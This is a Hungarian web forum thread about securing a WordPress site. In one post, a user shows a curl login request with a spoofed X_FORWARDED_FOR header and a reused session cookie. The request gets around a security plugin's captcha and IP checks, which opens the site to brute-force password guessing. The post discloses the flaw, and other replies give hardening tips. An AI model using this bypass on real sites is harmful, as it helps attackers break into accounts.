re: SOS segítség kellene wordpress oldalhoz
Idézet:
Pityu eredeti hozzászólása
Ne már, évek óta ezt használom :S
A captchat mindosszesen egyszer validalja egy session alatt, ugyhogy azt annyi megkerulni egy bruteforce script-el, hogy egyszer beirom es onnantol a kapott session_id-t hasznalom.
Az IP cimet az X_FORWARDED_FOR http fejlect alapjan ellenorzi, es azt arra allitod amire akarod:
Kód:
curl -i -s -k -X 'POST' \
-H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:50.0) Gecko/20100101 Firefox/50.0' -H 'Referer: http://localhost:9000/wp-login.php?redirect_to=http%3A%2F%2Flocalhost%3A9000%2Fwp-admin&reauth=1' -H 'Upgrade-Insecure-Requests: 1' -H 'Content-Type: application/x-www-form-urlencoded' \
-H "X_FORWARDED_FOR: 1.1.1.1" \
-b 'wordpress_test_cookie=WP+Cookie+check; PHPSESSID=c0cotcgsm8ja7pg24i16vba4b6' \
--data-binary $'log=foo&pwd=bar&wp-submit=Log+In&redirect_to=http%3A%2F%2Flocalhost%3A9000%2Fwp-admin&testcookie=1' \
'http://localhost:9000/wp-login.php'
re: SOS segítség kellene wordpress oldalhoz
Azért elég gáz így kiadni egy plugint...
re: SOS segítség kellene wordpress oldalhoz
Idézet:
Pityu eredeti hozzászólása
Azért elég gáz így kiadni egy plugint...
Ilyen az amikor olyan ember probal biztonsagi plugint fejleszteni, akinek fogalma sincs a biztonsagrol. Es sajnos 30ezer letoltese is van :( Jeleztem az embernek a hibat, gondolom javitja hamarosan.
re: SOS segítség kellene wordpress oldalhoz
Szerintem a 30.000 letöltő nevében mondom, hogy köszi a hibajelzést.
Azért valahol groteszk, hogy egy biztonsági plugin megbukik biztonságból...
re: SOS segítség kellene wordpress oldalhoz
ilyenkor olyan késztetést érzek, hogy belerúgjak a wordpressbe és kampányoljak vele, de visszafogom magam.
re: SOS segítség kellene wordpress oldalhoz
Mondjuk ez konkrétan nem a wordpress hibája, de értem a felháborodásod.
Idézet:
DomainFlotta eredeti hozzászólása
ilyenkor olyan késztetést érzek, hogy belerúgjak a wordpressbe és kampányoljak vele, de visszafogom magam.
re: SOS segítség kellene wordpress oldalhoz
1. XMLRPC-t tiltani (xmlrpc.php) - ezt hasznalja wp pingbackre, ha valami ez valoban serulekeny cucc, es rendesen ki is hasznaljak, pl tulterheleses pingback tamadas, stb.
2. Cache konfiguraciot ellenorizni, ha W3TC van, akkor cserelni erre: https://github.com/szepeviktor/w3-total-cache-fixed
3. Security modul: https://wordpress.org/plugins-wp/better-wp-security/
ha segitseg kell, irj nyugodtan: kovacsdanielakos kackac progweb pontocska hu
re: SOS segítség kellene wordpress oldalhoz
Idézet:
Pityu eredeti hozzászólása
Szerintem a 30.000 letöltő nevében mondom, hogy köszi a hibajelzést.
Azért valahol groteszk, hogy egy biztonsági plugin megbukik biztonságból...
En ezt a plugint lecserelnem a helyedben. Beszeltem a sraccal, es fogalmatlan szegeny. Amikor valaki azt kerdezi, hogy hogyan tudja a session_id-t valaki megnezni, majd azt mondja, hogy cookie-t fog hasznalni a kovetkezo valtozatban, mert az biztonsagosabb, az elmondja hogy semmit se ert a biztonsaghoz.